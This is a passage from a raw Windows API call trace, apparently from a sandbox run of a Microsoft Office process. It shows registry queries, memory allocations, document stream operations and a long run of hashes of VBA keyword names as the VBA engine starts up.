lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0x0, lpcbData=0x286e24*=0x4) returned 0x2 [0016.929] RegQueryValueExA (in: hKey=0x998, lpValueName="BreakOnAllErrors", lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0xff, lpcbData=0x286e24*=0x4) returned 0x2 [0016.930] RegQueryValueExA (in: hKey=0x998, lpValueName="BreakOnServerErrors", lpReserved=0x0, lpType=0x286e28, lpData=0x286e20, lpcbData=0x286e24*=0x4 | out: lpType=0x286e28*=0x0, lpData=0x286e20*=0x0, lpcbData=0x286e24*=0x4) returned 0x2 [0016.930] RegCloseKey (hKey=0x998) returned 0x0 [0016.930] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc0) returned 0x77e3350 [0016.930] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc0) returned 0x77e1880 [0016.930] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x1300) returned 0x7a69270 [0016.930] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4330000 [0016.931] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x5180000 [0016.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0016.932] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x4340000 [0016.932] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0016.932] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4370000 [0016.933] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4380000 [0016.934] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x43c0000 [0016.934] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Intrinsics") returned 0x109464 [0016.934] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4dd0000 [0016.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0016.935] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="") returned 0x10c0b3 [0016.935] CExposedDocFile::OpenStream () returned 0x0 [0016.935] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0x7957ef0 [0016.935] CExposedStream::AddRef () returned 0x2 [0016.935] CExposedStream::Release () returned 0x1 [0016.935] CExposedStream::Read () returned 0x0 [0016.937] GetProcAddress (hModule=0x7fee3560000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee356f200 [0016.937] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x4e80000 [0016.938] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x5360000 [0016.938] CExposedDocFile::CreateStream () returned 0x0 [0016.938] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0x7a6a580 [0016.938] CExposedStream::AddRef () returned 0x2 [0016.938] CExposedStream::Release () returned 0x1 [0016.938] CExposedStream::Release () returned 0x0 [0016.938] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a6a580) [0016.938] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0016.938] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x5030000 [0016.939] VirtualAlloc (lpAddress=0x5360000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x5360000 [0016.939] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0016.939] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0016.939] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0016.939] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0016.939] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0016.940] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0016.941] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0016.942] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0016.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0016.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0016.944] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x286460 | out: phkResult=0x286460*=0x99a) returned 0x0 [0016.944] RegOpenKeyW (in: hKey=0x99a, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x286458 | out: phkResult=0x286458*=0x9a2) returned 0x0 [0016.944] RegEnumKeyW (in: hKey=0x9a2, dwIndex=0x0, lpName=0x286488, cchName=0xa | out: lpName="8.7") returned 0x0 [0016.945] wcscpy_s (in: _Destination=0x286470, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0016.945] RegOpenKeyW (in: hKey=0x9a2, lpSubKey="8.7", phkResult=0x286518 | out: phkResult=0x286518*=0x9aa) returned 0x0 [0016.945] _ultoa_s (in: _Val=0x409, _DstBuf=0x286490, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0016.945] RegOpenKeyA (in: 